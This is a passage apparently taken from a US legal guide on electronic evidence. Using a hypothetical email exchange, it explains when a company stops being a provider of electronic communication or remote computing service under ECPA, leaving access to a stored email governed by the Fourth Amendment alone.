Cover art courtesy of Greg Kipper.
[…] Jane’s e-mail message and the communication reaches its destination (Joe),
Good Company ceases to be a provider of ECS with respect to that e-mail
(just like LocalISP ceased to be a provider of ECS with respect to Joe’s original
e-mail when Jane accessed it). Now for a more difficult question: what is the
status of Good Company if Joe decides to store the opened e-mail on Good
Company’s server? The correct answer is that Good Company is now a provider
of neither ECS nor RCS. Good Company does not provide RCS because unlike
LocalISP, Good Company does not provide services to the public. See 18 U.S.C.
§ 2711(2) (“[T]he term ‘remote computing service’ means the provision to the
public of computer storage or processing services by means of an electronic
communications system.”) (emphasis added); Andersen Consulting, 991 F.
Supp. at 1043. Because Good Company provides neither ECS nor RCS with
respect to the opened return e-mail in Joe’s account, ECPA no longer regulates
access to this e-mail, and such access is governed solely by the Fourth
Amendment.